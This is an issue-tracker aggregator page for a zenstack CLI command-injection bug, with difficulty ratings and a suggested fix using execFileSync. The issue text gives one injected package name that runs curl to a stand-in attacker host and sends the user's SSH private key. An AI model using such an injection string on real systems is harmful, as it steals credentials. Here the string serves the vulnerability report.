fix(cli): command injection via unsanitized string concatenation in execpackage and execprisma
Maintainers usually reply within 1 day
Nobody has claimed this yet.
- #2739 by @kumburovicbranko682-boop — closed without merging
Assessment
- Difficulty
- 3/5
- Estimated time
- Half a day
- Newbie friendliness
- 42/100
- Issue type
- Bug
- Clarity
- Clearly specified
- Activity status
- Quiet
- Tech stack
- node.js, typescript
Research direction
Start at packages/cli/src/utils/exec-utils.ts and read execPackage and execPrisma, noting every value concatenated into the shell string and which callers supply it (CLI args, config, Prisma schema names). The fix is to stop using shell mode — e.g. execFileSync with an argument array — and to update each call site accordingly, then run the CLI package tests. PR #2739 was closed unmerged, so read it first for prior context and why it was rejected before starting.
Written by the indexing model from the issue text.
Description
Description
execPackage and execPrisma build shell commands by concatenating strings and pass them to child_process.execSync (shell mode). If any caller passes user-influenced input (e.g., package names or prisma CLI args derived from CLI arguments, config files, or schema names), an attacker can inject arbitrary shell commands. For example, a crafted package name like "legit; curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)" would execute the injected command. This is a library with downstream consumers, so the blast radius extends to all consumers who don't sanitize before calling these. The execPrisma path is particularly concerning since it's called with args that may originate from user-provided Prisma schema or CLI flags.
Severity: high
File: packages/cli/src/utils/exec-utils.ts
Expected Behavior
The code should handle this case properly to avoid unexpected errors or degraded quality.
- Dominant language
- TypeScript
- Stars
- 2.9k
- Forks
- 157
- Avg merge
- 11h 42m
- Merged PRs (30d)
- 20
Getting set up
This project ships no dev container, Dockerfile or contributing guide, so setting up is up to you: start from its README, and see our first-contribution guide for the general steps.
First steps
- Read the whole issue, then the project's contributing guide.
- Comment on the issue to say you are picking it up — it saves two people doing the same work.
- Fork the repository and make your change on a branch.
- Open a pull request that references the issue number.
More from zenstackhq/zenstack
-
Difficulty 2/5 1-3 hours Newbie friendliness 68/100
zenstackhq/zenstack#2873 ·
Maintainers usually reply within 1 day
-
runtime
Difficulty 2/5 1-3 hours Newbie friendliness 78/100
zenstackhq/zenstack#2868 ·
Maintainers usually reply within 1 day
-
Difficulty 2/5 1-3 hours Newbie friendliness 72/100
zenstackhq/zenstack#2694 · 3 comments ·
Maintainers usually reply within 1 day
-
Difficulty 1/5 Under an hour Newbie friendliness 68/100
zenstackhq/zenstack#2659 · 2 comments ·
Maintainers usually reply within 1 day
-
Difficulty 2/5 1-3 hours Newbie friendliness 65/100
zenstackhq/zenstack#2542 · 1 comment ·
Maintainers usually reply within 1 day
All issues in zenstackhq/zenstack
Similar issues
-
area/frontend area/v2 kind/bug priority/needs-triage
Difficulty 2/5 1-3 hours Newbie friendliness 70/100
kubeflow/notebooks#1498 · 1 comment ·
Maintainers usually reply within 1 day
-
Difficulty 2/5 1-3 hours Newbie friendliness 75/100
Maintainers usually reply within 1 day
-
P1
Difficulty 2/5 1-3 hours Newbie friendliness 66/100
SuruchBoss/Cwork#90 ·
-
bug cli service
Difficulty 2/5 1-3 hours Newbie friendliness 82/100
Maintainers usually reply within 1 day
-
Difficulty 1/5 Under an hour Newbie friendliness 85/100
521xueweihan/HelloGitHub#3922 ·